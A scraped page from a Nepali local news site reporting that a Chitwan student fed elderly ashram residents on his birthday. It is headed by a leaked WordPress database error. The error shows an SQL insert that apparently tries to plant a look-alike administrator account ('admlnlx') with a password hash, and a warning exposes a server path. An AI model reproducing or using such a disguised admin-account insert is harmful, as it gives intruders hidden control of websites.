WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BwCTGJg1AsWp/W2dAbg3AiFlk5RuY20', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-05 03:40:30', '', 'admlnlx', 'admlnlx')


Warning: Trying to access array offset on value of type bool in /home/gaulekhabar.com/public_html/wp-content/themes/nepali-news-portal/header.php on line 21
जन्मदिनमा युवा विद्यार्थी ढकालको सामाजिक सेवा – Gaule Khabar

जन्मदिनमा युवा विद्यार्थी ढकालको सामाजिक सेवा

जन्मदिनमा युवा विद्यार्थी ढकालको सामाजिक सेवा

चितवन,माघ २६-

चितवनका युवा विद्यार्थी शिव ढकालले आफ्नो जन्मदिनको अवसर पारेर मानव सेवा आश्रम भरतपुरमा आश्रित वृद्धवृद्धालाई एक दिनको खाना खुवाएका छन् ।

लायन्स क्लव चितवन युथको आयोजनामा ढकालले मानव सेवा आश्रममा सो सहयोग गरेका हुन् । क्लवका डाइरेक्टर समेत रहेका उनले जन्मदिनमा फजुल खर्च गर्नुभन्दा समाज सेवा गर्नु उपयुक्त ठानेर खाना खुवाएको वताए । सो अवसरमा क्लवका सचिव दिपक ढकाल,अध्यक्ष विपिन रामुदामु,जोन चेयरपर्सन यम वहादुर विके लगाएतको सहभागीता रहेको थियो ।

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका